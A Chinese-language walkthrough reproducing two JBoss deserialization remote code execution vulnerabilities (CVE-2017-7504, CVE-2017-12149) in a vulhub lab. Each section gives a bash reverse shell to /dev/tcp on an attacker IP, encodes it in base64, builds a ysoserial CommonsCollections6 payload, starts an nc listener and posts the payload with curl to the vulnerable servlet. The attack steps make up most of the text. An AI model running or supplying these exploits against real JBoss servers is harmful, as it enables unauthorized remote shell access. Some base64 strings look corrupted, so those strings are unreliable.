Jboss远程代码执行漏洞(CVE-2017-7504)
影响范围
JBoss AS 4.x及之前版本
漏洞成因
JBoss AS 4.x在之前的版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件中存在反序列化漏洞,远程攻击者可以使用特殊的序列化数据执行任何代码。
漏洞利用
环境准备
名称 | IP |
---|---|
攻击机 | 192.168.75.162 |
靶机 | 192.168.75.146 |
首先输入以下命令进入以下命令vulhub在攻击机,然后访问攻击机http://192.168.75.146:8080即可
cd vulhub-master/jboss/CVE-2017-7504 docker-compose up -d
漏洞复现
首先准备好生成payload的工具:
然后准备反弹shell命令需要执行base64加密
//反弹shell命令,注意自己替换 bash -i >& /dev/tcp/192.168.75.162/6666 0>&1 //base64加密 YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA JjE=
java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA JjE=}|{base64,-d}|{bash,-i}" > poc.ser
执行上述命令后,将poc.ser接下来,新打开文件cmd窗口执行以下命令:
nc -lvvp 6666
监控启动后执行下列指令:
curl http://192.168.75.146:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser
如下图所示,
Jboss远程代码执行漏洞(CVE-2017-12149)
影响范围
漏洞影响5.x和6.x版本的JBOSSAS
漏洞成因
该漏洞为Java反序列化错误类型存在jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
漏洞利用
环境准备
名称 | IP |
---|---|
攻击机 | 192.168.75.162 |
靶机 | 192.168.75.146 |
首先输入以下命令进入以下命令vulhub在攻击机,然后访问攻击机http://192.168.75.146:8080即可
cd vulhub-master/jboss/CVE-2017-12149 docker-compose up -d
漏洞复现
首先,准备生成payload的工具:
然后准备反弹shell命令需要执行base64加密
//反弹shell命令,注意自己替换 bash -i >& /dev/tcp/192.168.75.162/6666 0>&1 //base64加密 YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA JjE=
java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA JjE=}|{base64,-d}|{bash,-i}" > poc.ser
执行上述命令后,将poc.ser接下来,新打开文件cmd窗口执行以下命令:
nc -lvvp 6666
监控启动后执行下列指令:
curl http://192.168.75.146:8080/invoker/readonly --data-binary @poc.ser
如下图所示,